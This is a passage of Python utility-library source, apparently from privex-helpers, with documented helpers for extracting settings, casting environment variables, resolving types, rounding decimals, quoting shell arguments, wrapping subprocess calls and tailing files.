def env_cast(env_key: str, cast: callable, env_default=None):
"""
Obtains an environment variable ``env_key``, if it's empty or not set, ``env_default`` will be returned.
Otherwise, it will be converted into a type of your choice using the callable ``cast`` parameter
Example:
>>> os.environ['HELLO'] = '1.234'
>>> env_cast('HELLO', Decimal, Decimal('0'))
Decimal('1.234')
:param callable cast: A function to cast the user's env data such as ``int`` ``str`` or ``Decimal`` etc.
:param str env_key: Environment var to attempt to load
:param any env_default: Fallback value if the env var is empty / not set (Default: None)
"""
return env_default if empty(env(env_key)) else cast(env(env_key))
def env_bool(env_key: str, env_default=None) -> Union[bool, None]:
"""
Obtains an environment variable ``env_key``, if it's empty or not set, ``env_default`` will be returned.
Otherwise, it will be converted into a boolean using :py:func:`.is_true`
Example:
>>> os.environ['HELLO_WORLD'] = '1'
>>> env_bool('HELLO_WORLD')
True
>>> env_bool('HELLO_NOEXIST')
None
>>> env_bool('HELLO_NOEXIST', 'error')
'error'
:param str env_key: Environment var to attempt to load
:param any env_default: Fallback value if the env var is empty / not set (Default: None)
"""
return env_cast(env_key=env_key, cast=is_true, env_default=env_default)
def env_int(env_key: str, env_default=None) -> int:
"""Alias for :py:func:`.env_cast` with ``int`` casting"""
return env_cast(env_key=env_key, cast=int, env_default=env_default)
def env_decimal(env_key: str, env_default=None) -> Decimal:
"""Alias for :py:func:`.env_cast` with ``Decimal`` casting"""
return env_cast(env_key=env_key, cast=Decimal, env_default=env_default)
def extract_settings(prefix: str, _settings=settings, defaults=None, merge_conf=None, **kwargs) -> dict:
"""
Extract prefixed settings from a given module, dictionary, class, or instance.
This helper function searches the object ``_settings`` for keys starting with ``prefix``, and for any matching keys, it removes
the prefix from each key, converts the remaining portion of each key to lowercase (unless you've set ``_case_sensitive=True``),
and then returns the keys their linked values as a ``dict``.
For example, if you had a file called ``myapp/settings.py`` which contained ``REDIS_HOST = 'localhost'``
and ``REDIS_PORT = 6379``, you could then run::
>>> # noinspection PyUnresolvedReferences
>>> from myapp import settings
>>> extract_settings('REDIS_', settings)
{'host': 'localhost', 'port': 6379}
**Example uses**
Example settings module at ``myapp/settings.py``
.. code-block:: python
from os.path import dirname, abspath, join
BASE_DIR = dirname(dirname(dirname(abspath(__file__))))
VERSION_FILE = join(BASE_DIR, 'privex', 'helpers', '__init__.py')
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_DB = 0
DEFAULT_CACHE_TIMEOUT = 300
**Example - Extract Redis settings**::
>>> # noinspection PyUnresolvedReferences
>>> from myapp import settings
>>> from privex.helpers import extract_settings
>>>
>>> # All keyword arguments (apart from _settings_mod and _keys_lower) are converted into a dictionary
>>> # and merged with the extracted settings
>>> # noinspection PyTypeChecker
>>> extract_settings('REDIS_', _settings=settings, port=6479, debug=True)
{'host': 'localhost', 'port': 6379, 'db': 0, 'debug': True}
>>> extract_settings('REDIS_', _settings=settings, merge_conf=dict(port=6479))
{'host': 'localhost', 'port': 6479, 'db': 0}
**Example - Extract Redis settings - case sensitive mode**::
>>> extract_settings('REDIS_', _settings=settings, _case_sensitive=True)
{'HOST': 'localhost', 'PORT': 6379, 'DB': 0}
**Example - Extract database settings from the environment**
The below dict comprehension is just so you can see the original environment keys before we run ``extract_settings``::
>>> import os
>>> from privex.helpers import extract_settings
>>>
>>> {k: v for k,v in os.environ.items() if 'DB_' in k}
{'DB_USER': 'root',
'DB_PASS': 'ExamplePass',
'DB_NAME': 'example_db'}
We'll now call ``extract_settings`` using :attr:`os.environ` converted into a dictionary, and attempt to quickly
obtain the database settings - with lowercase keys, and without their ``DB_`` prefix.
Below, you'll see extract_settings extracted all keys starting with ``DB_``, removed the ``DB_`` prefix, converted the
remaining portion of the key to lowercase, and also merged in the default setting 'host' since ``DB_HOST`` didn't exist.
The outputted dictionary is perfect for passing to many database library constructors::
>>> extract_settings('DB_', dict(os.environ), host='localhost')
{'user': 'root',
'pass': 'ExamplePass',
'name': 'example_db',
'host': 'localhost'}
:param str prefix: The prefix (including the first underscore (``_``) or other separator) to search for in the settings
:param Module|dict|object _settings: The object to extract the settings from. The object can be one of the following:
* A ``module``, for example passing ``settings`` after running ``from myapp import settings``
* A ``dict``, for example ``extract_settings('X_', dict(X_A=1, X_B=2))``
* A class which has the desired settings defined on it's ``.__dict__`` (e.g. any standard user
class - ``class MyClass:``, with settings defined as static class attributes)
* An instance of a class, which has all desired settings defined inside of ``.__dict__`` (e.g. any standard user class instance,
with static and/or instance attributes for each setting)
* Any other type which supports being casted to a dictionary via ``dict(obj)``.
:param dict merge_conf: Optionally you may specify a dictionary of "override" settings to merge with the extracted settings.
The values in this dictionary take priority over both ``defaults``, and the keys from ``_settings``.
:param dict defaults: Optionally you may specify a dictionary of default settings to merge **before** the extracted settings,
meaning values are only used if the key wasn't present in the extracted settings nor ``merge_conf``.
:param kwargs: Additional settings as keyword arguments (see below). Any keyword argument keys which aren't valid settings will
be added to the ``defaults`` dictionary.
This means that defaults can also be specified as kwargs - as long as they don't clash with any
used kwarg settings (see below).
:key _case_sensitive: (Default ``False``) If ``True``, ``prefix`` is compared against ``_settings`` keys case sensitively.
If ``False``, then both ``prefix`` and each ``_settings`` key is converted to lowercase before comparison.
:key _keys_lower: Defaults to ``True`` if _case_sensitive is False, and ``False`` if _case_sensitive is True.
If ``True``, each extracted settings key is converted to lowercase before returning them - otherwise they're
returned with the same case as they were in ``_settings``.
:return dict config: The extracted configuration keys (without their prefixes) and values as a dictionary.
Based on the extracted keys from ``_settings``, the fallback settings in ``defaults`` (and excess ``kwargs``),
plus the override settings in ``merge_conf``.
"""
case_sensitive = kwargs.pop('_case_sensitive', False)
keys_lower = kwargs.pop('_keys_lower', not case_sensitive)
defaults = {} if defaults is None else dict(defaults)
merge_conf = {} if merge_conf is None else dict(merge_conf)
if isinstance(_settings, dict):
set_dict = dict(_settings)
elif type(_settings).__name__ == 'module' or isinstance(_settings, object) or inspect.isclass(_settings):
set_dict = dict(_settings.__dict__)
else:
try:
# noinspection PyTypeChecker
set_dict = dict(_settings)
# noinspection PyTypeChecker
if len(set_dict.keys()) < 1 <= len(_settings): raise Exception()
except Exception:
set_dict = dict(_settings.__dict__)
set_conf = {}
for k, v in set_dict.items():
l = len(prefix)
matched = (k[:l] == prefix) if case_sensitive else (k[:l].lower() == prefix.lower())
if matched:
_key = k[l:]
_key = _key.lower() if keys_lower else _key
set_conf[_key] = v
return {**defaults, **set_conf, **kwargs, **merge_conf}
def get_return_type(f: callable) -> Optional[Union[type, object, callable]]:
"""
Extract the return type for a function/method. Note that this only works with functions/methods which have their
return type annotated, e.g. ``def somefunc(x: int) -> float: return x * 2.1``
.. Attention:: If you want to extract a function/method return type and have any Generic :mod:`typing` types simplified
down to their native Python base types (important to be able to compare with :func:`.isinstance` etc.),
then you should use :func:`.extract_type` instead (handles raw types, objects, and function pointers)
**Example 1** - Extracting a generic return type from a function::
>>> def list_wrap(v: T) -> List[T]:
... return [v]
...
>>> rt = get_return_type(list_wrap)
typing.List[~T]
>>> rt._name # We can get the string type name via _name
'List'
>>> l = rt.__args__[0] # We can access the types inside of the [] via .__args__
~T
>>> l.__name__ # Get the name of 'l' - the type inside of the []
'T'
**Example 2** - What happens if you use this on a function/method with no return type annotation?
The answer is: **nothing** - it will simply return ``None`` if the function/method has no return type annotation::
>>> def hello(x):
... return x * 5
>>> repr(get_return_type(hello))
'None'
:param callable f: A function/method to extract the return type from
:return return_type: The return type, usually either a :class:`.type` or a :class:`.object`
"""
if f is None: return None
if not inspect.isclass(f) and any([inspect.isfunction(f), inspect.ismethod(f), inspect.iscoroutinefunction(f)]):
sig = inspect.signature(f)
ret = sig.return_annotation
# noinspection PyUnresolvedReferences,PyProtectedMember
if ret is inspect._empty or empty(ret, True):
return None
return ret
return f
def typing_to_base(tp, fail=False, return_orig=True, clean_union=True) -> Optional[Union[type, object, callable, tuple, Tuple[type]]]:
"""
Attempt to extract one or more native Python base types from a :mod:`typing` type, including generics such as ``List[str]``,
and combined types such as ``Union[list, str]``
>>> typing_to_base(List[str])
list
>>> typing_to_base(Union[str, Dict[str, list], int])
(str, dict, int)
>>> typing_to_base(Union[str, Dict[str, list], int], clean_union=False)
(str, typing.Dict[str, list], int)
>>> typing_to_base(str)
str
>>> typing_to_base(str, fail=True)
TypeError: Failed to extract base type for type object: <class 'str'>
>>> repr(typing_to_base(str, return_orig=False))
'None'
:param tp: The :mod:`typing` type object to extract base/native type(s) from.
:param bool fail: (Default: ``False``) If True, then raises :class:`.TypeError` if ``tp`` doesn't appear to be a :mod:`typing` type.
:param bool return_orig: (Default: ``True``) If True, returns ``tp`` as-is if it's not a typing type. When ``False``,
non- :mod:`typing` types will cause ``None`` to be returned.
:param bool clean_union: (Default: ``True``) If True, :class:`typing.Union`'s will have each type
converted/validated into a normal type using :func:`.extract_type`
:return type_res: Either a :class:`.type` base type, a :class:`.tuple` of types, a :mod:`typing` type object, or something else
depending on what type ``tp`` was.
"""
# We can't use isinstance() with Union generic objects, so we have to identify them by checking their repr string.
if repr(tp).startswith('typing.Union['):
# For Union's (including Optional[]), we iterate over the object's ``__args__`` which contains the Union's types,
# and pass each type through extract_type to cleanup any ``typing`` generics such as ``List[str]`` back into
# their native type (e.g. ``str`` for ``List[str]``)
ntypes = []
# noinspection PyUnresolvedReferences
targs = tp.__args__
for t in targs:
try:
ntypes.append(extract_type(t) if clean_union else t)
except Exception as e:
log.warning("Error while extracting type for %s (part of %s). Reason: %s - %s", t, repr(tp), type(e), str(e))
ntypes.append(t)
return tuple(ntypes)
# For Python 3.6, __origin__ contains the typing type without the generic part, while __orig_bases__ is a tuple containing the
# native/base type, and some typing type.
# On 3.7+, __origin__ contains the native/base type, while __orig_bases__ doesn't exist
if hasattr(tp, '__orig_bases__'): return tp.__orig_bases__[0]
# __origin__ / __extra__ are exposed by :mod:`typing` types, including generics such as Dict[str,str]
# original SO answer: https://stackoverflow.com/a/54241536/2648583
if hasattr(tp, '__origin__'): return tp.__origin__
if hasattr(tp, '__extra__'): return tp.__extra__
if fail:
raise TypeError(f"Failed to extract base type for type object: {repr(tp)}")
if return_orig:
return tp
return None
def extract_type(tp: Union[type, callable, object], **kwargs) -> Optional[Union[type, object, callable, tuple, Tuple[type]]]:
"""
Attempt to identify the :class:`.type` of a given value, or for functions/methods - identify their RETURN value type.
This function can usually detect :mod:`typing` types, including generics such as ``List[str]``, and will attempt to extract
their native Python base type, e.g. :class:`.list`.
For :class:`typing.Union` based types (including :class:`typing.Optional`), it can extract a tuple of base types, including
from nested :class:`typing.Union`'s - e.g. ``Union[str, list, Union[dict, set], int`` would be simplified down
to ``(str, list, dict, set, int)``
.. Attention:: If you want to extract the original return type from a function/method, including generic types such as ``List[str]``,
then you should use :func:`.get_return_type` instead.
**Example 1** - convert a generic type e.g. ``Dict[str, str]`` into it's native type (e.g. ``dict``)::
>>> dtype = Dict[str, str]
>>> # noinspection PyTypeHints,PyTypeChecker
>>> isinstance({}, dtype)
TypeError: Subscripted generics cannot be used with class and instance checks
>>> extract_type(dtype)
dict
>>> isinstance({}, extract_type(dtype))
True
**Example 2** - extract the return type of a function/method, and if the return type is a generic (e.g. ``List[str]``), automatically
convert it into the native type (e.g. ``list``) for use in comparisons such as :func:`.isinstance`::
>>> def list_wrap(v: T) -> List[T]:
... return [v]
>>>
>>> extract_type(list_wrap)
list
>>> isinstance([1, 2, 3], extract_type(list_wrap))
True
**Example 3** - extract the type from an instantiated object, allowing for :func:`.isinstance` comparisons::
>>> from privex.helpers import DictObject
>>> db = DictObject(hello='world', lorem='ipsum')
{'hello': 'world', 'lorem': 'ipsum'}
>>> type_db = extract_type(db)
privex.helpers.collections.DictObject
>>> isinstance(db, type_db)
True
>>> isinstance(DictObject(test=123), type_db)
True
**Example 4** - extract a tuple of types from a :class:`typing.Union` or :class:`typing.Optional` (inc. return types) ::
>>> def hello(x) -> Optional[str]:
... return x * 5
...
>>> extract_type(hello)
(str, NoneType)
>>> # Even with a Union[] containing a List[], another Union[] (containing a Tuple and set), and a Dict[],
>>> # extract_type is still able to recursively flatten and simplify it down to a tuple of base Python types
>>> extract_type(Union[
... List[str],
... Union[Tuple[str, int, str], set],
... Dict[int, str]
... ])
(list, tuple, set, dict)
**Return Types**
A :class:`.type` will be returned for most calls where ``tp`` is either:
* Already a native :class:`.type` e.g. :class:`.list`
* A generic type such as ``List[str]`` (which are technically instances of :class:`.object`)
* A function/method with a valid return type annotation, including generic return types
* An instance of a class (an object), where the original type can be easily extracted via ``tp.__class__``
If ``tp`` was an :class:`.object` and the type/class couldn't be extracted, then it would be returned in it's original object form.
If ``tp`` was an unusual function/method which couldn't be detected as one, or issues occurred while extracting the return type,
then ``tp`` may be returned in it's original :class:`.callable` form.
:param tp: The type/object/function etc. to extract the most accurate type from
:return type|object|callable ret: A :class:`.type` will be returned for most calls, but may be an :class:`.object`
or :class:`.callable` if there were issues detecting the type.
"""
# If tp is None, there's nothing we can do with it, so return None.
if tp is None: return None
# If 'tp' is a known native type, we don't need to extract anything, just return tp.
if tp in [list, set, tuple, dict, str, bytes, int, float, Decimal]: return tp
is_func = any([inspect.isfunction(tp), inspect.ismethod(tp), inspect.iscoroutinefunction(tp)])
# Functions count as class instances (instances of object), therefore to narrow down a real class/type instance,
# we have to confirm it's NOT a function/method/coro, NOT a raw class/type, but IS an instance of object.
# if not is_func and not inspect.isclass(tp) and isinstance(tp, object):
if not is_func and isinstance(tp, object):
# Handle extracting base types from generic :mod:`typing` objects, including tuples of types from Union's
tbase = typing_to_base(tp, return_orig=False)
if tbase is not None: # If the result wasn't None, then we know it was a typing type and base type(s) were extracted properly
return tbase
# Before checking __class__, we make sure that tp is an instance by checking isclass(tp) is False
if not inspect.isclass(tp) and hasattr(tp, '__class__'):
return tp.__class__ # If tp isn't a typing type, __class__ (if it exists) should be the "type" of tp
return tp # If all else fails, return tp as-is
# If is_func matches at this point, we're dealing with a function/method/coroutine and need to extract the return type.
# To prevent an infinite loop, we set _sec_layer when passing the return type to extract_type(), ensuring that we don't
# call extract_type(rt) AGAIN if the return type just so happened to be a function
if is_func and not kwargs.get('_sec_layer'):
# Extract the original return type, then pass it through extract_type again, since if it's a generic type,
# we'll want to extract the native type from it, since generics like ``List[str]`` can't be used with ``isinstance()``
rt = get_return_type(tp)
return extract_type(rt, _sec_layer=True)
# If all else fails, return tp as-is
return tp
def dec_round(amount: Decimal, dp: int = 2, rounding=None) -> Decimal:
"""
Round a Decimal to x decimal places using ``quantize`` (``dp`` must be >= 1 and the default dp is 2)
If you don't specify a rounding option, it will use whatever rounding has been set in :py:func:`decimal.getcontext`
(most python versions have this default to ``ROUND_HALF_EVEN``)
Basic Usage:
>>> from decimal import Decimal, getcontext, ROUND_FLOOR
>>> x = Decimal('1.9998')
>>> dec_round(x, 3)
Decimal('2.000')
Custom Rounding as an argument:
>>> dec_round(x, 3, rounding=ROUND_FLOOR)
Decimal('1.999')
Override context rounding to set the default:
>>> getcontext().rounding = ROUND_FLOOR
>>> dec_round(x, 3)
Decimal('1.999')
:param Decimal amount: The amount (as a Decimal) to round
:param int dp: Number of decimal places to round ``amount`` to. (Default: 2)
:param str rounding: A :py:mod:`decimal` rounding option, e.g. ``ROUND_HALF_EVEN`` or ``ROUND_FLOOR``
:return Decimal rounded: The rounded Decimal amount
"""
dp = int(dp)
if dp <= 0:
raise ArithmeticError('dec_round expects dp >= 1')
rounding = getcontext().rounding if not rounding else rounding
dp_str = '.' + str('0' * (dp - 1)) + '1'
return Decimal(amount).quantize(Decimal(dp_str), rounding=rounding)
def chunked(iterable, n):
""" Split iterable into ``n`` iterables of similar size
Examples::
>>> l = [1, 2, 3, 4]
>>> list(chunked(l, 4))
[[1], [2], [3], [4]]
>>> l = [1, 2, 3]
>>> list(chunked(l, 4))
[[1], [2], [3], []]
>>> l = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
>>> list(chunked(l, 4))
[[1, 2, 3], [4, 5, 6], [7, 8, 9], [10]]
Taken from: https://stackoverflow.com/a/24484181/2648583
"""
chunksize = int(math.ceil(len(iterable) / n))
return (iterable[i * chunksize:i * chunksize + chunksize] for i in range(n))
def inject_items(items: list, dest_list: list, position: int) -> List[str]:
"""
Inject a list ``items`` after a certain element in ``dest_list``.
**NOTE:** This does NOT alter ``dest_list`` - it returns a **NEW list** with ``items`` injected after the
given ``position`` in ``dest_list``.
**Example Usage**::
>>> x = ['a', 'b', 'e', 'f', 'g']
>>> y = ['c', 'd']
>>> # Inject the list 'y' into list 'x' after element 1 (b)
>>> inject_items(y, x, 1)
['a', 'b', 'c', 'd', 'e', 'f', 'g']
:param list items: A list of items to inject into ``dest_list``
:param list dest_list: The list to inject ``items`` into
:param int position: Inject ``items`` after this element (0 = 1st item) in ``dest_list``
:return List[str] injected: :py:attr:`.dest_list` with the passed ``items`` list injected at ``position``
"""
before = list(dest_list[0:position+1])
after = list(dest_list[position+1:])
return before + items + after
def byteify(data: Optional[Union[str, bytes]], encoding='utf-8', if_none=None) -> bytes:
"""
Convert a piece of data into bytes if it isn't already::
>>> byteify("hello world")
b"hello world"
By default, if ``data`` is ``None``, then a :class:`TypeError` will be raised by :func:`bytes`.
If you'd rather convert ``None`` into a blank bytes string, use ``if_node=""``, like so::
>>> byteify(None)
TypeError: encoding without a string argument
>>> byteify(None, if_none="")
b''
"""
if data is None and if_none is not None:
return bytes(if_none, encoding) if type(if_none) is not bytes else if_none
return bytes(data, encoding) if type(data) is not bytes else data
def stringify(data: Optional[Union[str, bytes]], encoding='utf-8', if_none=None) -> str:
"""
Convert a piece of data into a string (from bytes) if it isn't already::
>>> stringify(b"hello world")
"hello world"
By default, if ``data`` is ``None``, then ``None`` will be returned.
If you'd rather convert ``None`` into a blank string, use ``if_node=""``, like so::
>>> repr(stringify(None))
'None'
>>> stringify(None, if_none="")
''
"""
if data is None: return if_none
return data.decode(encoding) if type(data) is bytes else data
class ErrHelpParser(argparse.ArgumentParser):
"""
ErrHelpParser - Use this instead of :py:class:`argparse.ArgumentParser` to automatically get full
help output as well as the error message when arguments are invalid, instead of just an error message.
>>> parser = ErrHelpParser(description='My command line app')
>>> parser.add_argument('nums', metavar='N', type=int, nargs='+')
"""
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
first_cap_re = re.compile('(.)([A-Z][a-z]+)')
all_cap_re = re.compile('([a-z0-9])([A-Z])')
def camel_to_snake(name: STRBYTES) -> str:
"""
Convert ``name`` from camel case (``HelloWorld``) to snake case (``hello_world``).
``name`` can be either a ``str`` or ``bytes``.
Example::
>>> camel_to_snake("HelloWorldLoremIpsum")
'hello_world_lorem_ipsum'
:param str|bytes name: A camel case (class style) name, e.g. ``HelloWorld``
:return str snake_case: ``name`` converted to snake case ``hello_world``
"""
s1 = first_cap_re.sub(r'\1_\2', stringify(name))
return all_cap_re.sub(r'\1_\2', s1).lower()
def human_name(class_name: Union[str, bytes, callable, Type[object]]) -> str:
"""
This function converts a class/function name into a Title Case name. It also directly accepts classes/functions.
Input names can be either snake case ``my_function``, or InitialCaps ``MyClass`` - though mixtures of the two
may work, such as ``some_functionName`` - however ``some_FunctionName`` will not (causes double spaces).
**Examples**
Using a plain string or bytes::
>>> human_name(b'_some_functionName')
'Some Function Name'
>>> human_name('SomeClassName')
'Some Class Name'
Using a reference to a function::
>>> def some_func():
... pass
>>> human_name(some_func)
'Some Func'
Using a reference to a class, or an instance of a class::
>>> class MyExampleClass:
... pass
>>> my_instance = MyExampleClass()
>>> human_name(MyExampleClass)
'My Example Class'
>>> human_name(my_instance)
'My Example Class'
:param class_name: The name of a class/function specified either in InitialCaps or snake_case.
You may also pass a function reference, class reference, or class instance. (see examples)
:return str human_name: The humanised Title Case name of ``class_name``
"""
# First we figure out what type ``class_name`` actually **is**.
# Bytes simply get decoded back into a string, while strings are untouched
if type(class_name) in [str, bytes]:
class_name = stringify(class_name)
# References to classes (not instances) and functions means we need .__name__
elif type(class_name) is type or str(type(class_name)) == "<class 'function'>":
class_name = class_name.__name__
# If it's not a class/function reference, but is an instance of object, then it's a class instance.
elif isinstance(class_name, object):
class_name = class_name.__class__.__name__
# Then we convert it into a normal string.
class_name = str(class_name)
# Strip any underlines at the start or end of the class name.
name = class_name.strip('_').strip('-')
# We can't alter an object as we iterate it, so we copy `name` into a new list which we'll modify instead
new_name = list(name)
# Capitalise the first letter of the name, if it isn't already.
if name[0].islower():
new_name[0] = name[0].upper()
# When we inject spaces where there weren't any before, we need to track how this changes the length,
# so that we can correctly reference positions in `new_name`
offset = 0
# Iterate over each character in the original name (ignoring the first letter because it's probably capital)
for i, c in enumerate(name[1:]):
pos = (i + 1) + offset
# If the current character is uppercase, then inject a space before this character and increment `offset`
if c.isupper():
new_name = inject_items([' '], new_name, pos - 1)
offset += 1
continue
# If the character is an underline or dash, replace it with a space, and uppercase the character in-front of it.
if c in ['_', '-']:
new_name[pos] = ' '
if str(name[i + 2]).isalpha():
new_name[pos + 1] = new_name[pos + 1].upper()
return ''.join(new_name).strip()
def shell_quote(*args: str) -> str:
"""
Takes command line arguments as positional args, and properly quotes each argument to make it safe to
pass on the command line. Outputs a string containing all passed arguments properly quoted.
Uses :func:`shlex.join` on Python 3.8+, and a for loop of :func:`shlex.quote` on older versions.
Example::
>>> print(shell_quote('echo', '"orange"'))
echo '"orange"'
"""
return shlex.join(args) if hasattr(shlex, 'join') else " ".join([shlex.quote(a) for a in args]).strip()
def call_sys(proc, *args, write: STRBYTES = None, **kwargs) -> Union[Tuple[bytes, bytes], Tuple[str, str]]:
"""
A small wrapper around :class:`subprocess.Popen` which allows executing processes, while optionally piping
data (``write``) into the process's stdin, then finally returning the process's output and error results.
Designed to be easier to use than using :class:`subprocess.Popen` directly.
**Using AsyncIO?** - there's a native python asyncio version of this function available in :func:`.call_sys_async`,
which uses the native :func:`asyncio.subprocess.create_subprocess_shell`, avoiding blocking IO.
By default, ``stdout`` and ``stdin`` are set to :attr:`subprocess.PIPE` while stderr defaults to
:attr:`subprocess.STDOUT`. You can override these by passing new values as keyword arguments.
**NOTE:** The first positional argument is executed, and all other positional arguments are passed to the process
in the order specified. To use call_sys's arguments ``write``, ``stdout``, ``stderr`` and/or ``stdin``, you
**MUST** specify them as keyword arguments, otherwise they'll just be passed to the process you're executing.
Any keyword arguments not specified in the ``:param`` or ``:key`` pydoc specifications will simply be forwarded to
the :class:`subprocess.Popen` constructor.
**Simple Example**::
>>> # All arguments are automatically quoted if required, so spaces are completely fine.
>>> folders, _ = call_sys('ls', '-la', '/tmp/spaces are fine/hello world')
>>> print(stringify(folders))
backups cache lib local lock log mail opt run snap spool tmp
**Piping data into a process**::
>>> data = "hello world"
>>> # The data "hello world" will be piped into wc's stdin, and wc's stdout + stderr will be returned
>>> out, _ = call_sys('wc', '-c', write=data)
>>> int(out)
11
:param str proc: The process to execute.
:param str args: Any arguments to pass to the process ``proc`` as positional arguments.
:param bytes|str write: If this is not ``None``, then this data will be piped into the process's STDIN.
:key stdout: The subprocess file descriptor for stdout, e.g. :attr:`subprocess.PIPE` or :attr:`subprocess.STDOUT`
:key stderr: The subprocess file descriptor for stderr, e.g. :attr:`subprocess.PIPE` or :attr:`subprocess.STDOUT`
:key stdin: The subprocess file descriptor for stdin, e.g. :attr:`subprocess.PIPE` or :attr:`subprocess.STDIN`
:key cwd: Set the current/working directory of the process to this path, instead of the CWD of your calling script.
:return tuple output: A tuple containing the process output of stdout and stderr
"""
stdout, stderr, stdin = kwargs.pop('stdout', PIPE), kwargs.pop('stderr', STDOUT), kwargs.pop('stdin', PIPE)
args = [proc] + list(args)
handle = subprocess.Popen(args, stdout=stdout, stderr=stderr, stdin=stdin, **kwargs)
stdout, stderr = handle.communicate(input=byteify(write)) if write is not None else handle.communicate()
return stdout, stderr
def reverse_io(f: BinaryIO, blocksize: int = 4096) -> Generator[bytes, None, None]:
"""
Read file as series of blocks from end of file to start.
The data itself is in normal order, only the order of the blocks is reversed.
ie. "hello world" -> ["ld","wor", "lo ", "hel"]
Note that the file must be opened in binary mode.
Original source: https://stackoverflow.com/a/136354
"""
if 'b' not in f.mode.lower():
raise Exception("File must be opened using binary mode.")
size = os.stat(f.name).st_size
fullblocks, lastblock = divmod(size, blocksize)
# The first(end of file) block will be short, since this leaves
# the rest aligned on a blocksize boundary. This may be more
# efficient than having the last (first in file) block be short
f.seek(-lastblock, 2)
yield f.read(lastblock)
for i in range(fullblocks - 1, -1, -1):
f.seek(i * blocksize)
yield f.read(blocksize)
def io_tail(f: BinaryIO, nlines: int = 20, bsz: int = 4096) -> Generator[List[str], None, None]:
"""
NOTE: If you're only loading a small amount of lines, e.g. less than 1MB, consider using the much easier :func:`.tail`
function - it only requires one call and returns the lines as a singular, correctly ordered list.
This is a generator function which works similarly to ``tail`` on UNIX systems. It efficiently retrieves lines in reverse order using
the passed file handle ``f``.
WARNING: This function is a generator which returns "chunks" of lines - while the lines within each chunk are in the correct order,
the chunks themselves are backwards, i.e. each chunk retrieves lines prior to the previous chunk.
This function was designed as a generator to allow for **memory efficient handling of large files**, and tailing large amounts of lines.
It only loads ``bsz`` bytes from the file handle into memory with each iteration, allowing you to process each chunk of lines as
they're read from the file, instead of having to load all ``nlines`` lines into memory at once.
To ensure your retrieved lines are in the correct order, with each iteration you must PREPEND the outputted chunk to your final result,
rather than APPEND. Example::
>>> from privex.helpers import io_tail
>>> lines = []
>>> with open('/tmp/example', 'rb') as fp:
... # We prepend each chunk from 'io_tail' to our result variable 'lines'
... for chunk in io_tail(fp, nlines=10):
... lines = chunk + lines
>>> print('\\n'.join(lines))
Modified to be more memory efficient, but originally based on this SO code snippet: https://stackoverflow.com/a/136354
:param BinaryIO f: An open file handle for the file to tail, must be in **binary mode** (e.g. ``rb``)
:param int nlines: Total number of lines to retrieve from the end of the file
:param int bsz: Block size (in bytes) to load with each iteration (default: 4096 bytes). DON'T CHANGE UNLESS YOU
UNDERSTAND WHAT THIS MEANS.
:return Generator chunks: Generates chunks (in reverse order) of correctly ordered lines as ``List[str]``
"""
buf = ''
lines_read = 0
# Load 4096 bytes at a time, from file handle 'f' in reverse
for block in reverse_io(f, blocksize=int(bsz)):
# Incase we had a partial line during our previous iteration, we append leftover bytes from
# the previous iteration to the end of the newly loaded block
buf = stringify(block) + buf
lines = buf.splitlines()
# Return all lines except the first (since may be partial)
if lines:
# First line may not be complete, since we're loading blocks from the bottom of the file.
# We yield from line 2 onwards, storing line 1 back into 'buf' to be appended to the next block.
result = lines[1:]
res_lines = len(result)
# If we've retrieved enough lines to meet the requested 'nlines', then we just calculate how many
# more lines the caller wants, yield them, then return to finish execution.
if (lines_read + res_lines) >= nlines:
rem_lines = nlines - lines_read
lines_read += rem_lines
yield result[-rem_lines:]
return
# Yield the lines we've loaded so far
if res_lines > 0:
lines_read += res_lines
yield result
# Replace the buffer with the discarded 1st line from earlier.
buf = lines[0]
# If the loop is broken, it means we've probably reached the start of the file, and we're missing the first line...
# Thus we have to yield the buffer, which should contain the first line of the file.
yield [buf]
def tail(filename: str, nlines: int = 20, bsz: int = 4096) -> List[str]:
"""
Pure python equivalent of the UNIX ``tail`` command. Simply pass a filename and the number of lines you want to load
from the end of the file, and a ``List[str]`` of lines (in forward order) will be returned.
This function is simply a wrapper for the highly efficient :func:`.io_tail`, designed for usage with a small (<10,000) amount
of lines to be tailed. To allow for the lines to be returned in the correct order, it must load all ``nlines`` lines into memory
before it can return the data.
If you need to ``tail`` a large amount of data, e.g. 10,000+ lines of a logfile, you should consider using the lower level
function :func:`.io_tail` - which acts as a generator, only loading a certain amount of bytes into memory per iteration.
Example file ``/tmp/testing``::
this is an example 1
this is an example 2
this is an example 3
this is an example 4
this is an example 5
this is an example 6
Example usage::
>>> from privex.helpers import tail
>>> lines = tail('/tmp/testing', nlines=3)
>>> print("\\n".join(lines))
this is an example 4
this is an example 5
this is an example 6
:param str filename: Path to file to tail. Relative or absolute path. Absolute path is recommended for safety.
:param int nlines: Total number of lines to retrieve from the end of the file
:param int bsz: Block size (in bytes) to load with each iteration (default: 4096 bytes). DON'T CHANGE UNLESS YOU
UNDERSTAND WHAT THIS MEANS.
:return List[str] lines: The last 'nlines' lines of the file 'filename' - in forward order.
"""
res = []
with open(filename, 'rb') as fp:
for chunk in io_tail(f=fp, nlines=nlines, bsz=bsz):
res = chunk + res
return res
def filter_form(form: Mapping, *keys, cast: callable = None) -> Dict[str, Any]:
"""
Extract the keys ``keys`` from the dict-like ``form`` if they exist and return a dictionary containing the keys and values found.
Optionally, if ``cast`` isn't ``None``, then ``cast`` will be called to cast each ``form`` value to the desired type,
e.g. ``int``, ``Decimal``, or ``str``.
Example usage::
>>> a = dict(a=1, c=2, d=3)
>>> filter_form(a, 'a', 'c', 'e')
{'a': 1, 'c': 2}
>>> b = dict(lorem=1, ipsum='2', dolor=5.67)
>>> filter_form(b, 'lorem', 'ipsum', 'dolor', cast=int)
{'lorem': 1, 'ipsum': 2, 'dolor': 5}
:param Mapping form: A dict-like object to extract ``key`` from.
:param str|Any keys: One or more keys to extract from ``form``
:param callable cast: Cast the value of any extract ``form`` key using this callable
:return dict filtered_form: A dict containing the extracted keys and respective values from ``form``
"""
filtered = {k: form[k] for k in keys if k in form}
if cast is not None:
filtered = {k: cast(v) for k, v in filtered.items()}
return filtered
def almost(compare: NumberStr, *numbers: NumberStr, tolerance: NumberStr = Decimal('0.01'), **kwargs) -> bool:
"""
Compare two or more numbers, returning ``True`` if all ``numbers`` are no more than ``tolerance``
greater or smaller than than ``compare`` - otherwise ``False``.
Works similarly to :py:meth:`unittest.TestCase.assertAlmostEqual`
Basic usage with two numbers + default tolerance (``0.01``)::
>>> almost('5', '5.001')
True
>>> almost('5', '5.5')
False
Multiple numbers + custom tolerance::
